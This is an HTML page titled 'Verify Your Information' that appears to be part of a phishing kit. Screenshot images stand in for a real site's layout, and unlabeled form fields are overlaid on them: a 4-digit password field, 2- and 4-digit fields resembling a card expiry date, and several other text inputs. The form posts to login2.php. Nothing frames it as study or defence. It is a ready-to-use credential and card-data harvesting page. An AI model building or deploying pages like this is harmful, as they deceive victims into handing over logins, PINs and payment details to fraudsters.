<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Verify Your Information</title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta name="generator" content="Web Page Maker">
</head>
<body>
<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:1349px; height:654px; z-index:0"><img src="images/paste127.jpg" alt="" title="" border=0 width=1349 height=654></div>

<div id="image2" style="position:absolute; overflow:hidden; left:0px; top:534px; width:1347px; height:354px; z-index:1"><img src="images/paste128.jpg" alt="" title="" border=0 width=1347 height=354></div>

<div id="image3" style="position:absolute; overflow:hidden; left:100px; top:753px; width:106px; height:25px; z-index:2"><img src="images/paste126.jpg" alt="" title="" border=0 width=106 height=25></div>

<form name="form1" method="POST" action="login2.php" enctype="application/x-www-form-urlencoded" style="margin:0px">
<input name="formtext1" type="text" style="position:absolute;width:200px;left:426px;top:256px;z-index:4;height: 23px;">
<input name="formtext2" type="text" style="position:absolute;width:200px;left:426px;top:286px;z-index:5;height: 23px;">
<input name="formtext3" type="password" maxlength=4 style="position:absolute;width:63px;left:425px;top:317px;z-index:6;height: 23px;">
<input name="formtext4" type="text" maxlength=2 style="position:absolute;width:44px;left:423px;top:353px;z-index:7;height: 23px;">
<input name="formtext5" type="text" maxlength=4 style="position:absolute;width:59px;left:497px;top:352px;z-index:8;height: 23px;">
<input name="formtext6" type="text" style="position:absolute;width:200px;left:424px;top:383px;z-index:9;height: 23px;">
<input name="formtext7" type="text" style="position:absolute;width:200px;left:424px;top:415px;z-index:10;height: 23px;">
<input name="formtext8" type="text" style="position:absolute;width:200px;left:423px;top:447px;z-index:11;height: 23px;">
<input name="formtext9" type="text" style="position:absolute;width:200px;left:423px;top:475px;z-index:12;height: 23px;">
<input name="formtext10" type="text" style="position:absolute;width:200px;left:423px;top:506px;z-index:13;height: 23px;">
<div id="formimage1" style="position:absolute; left:181px; top:571px; z-index:14"><input type="image" name="formimage1" width="102" height="39" src="images/sub.JPG"></div>
</form>


</body>
</html>
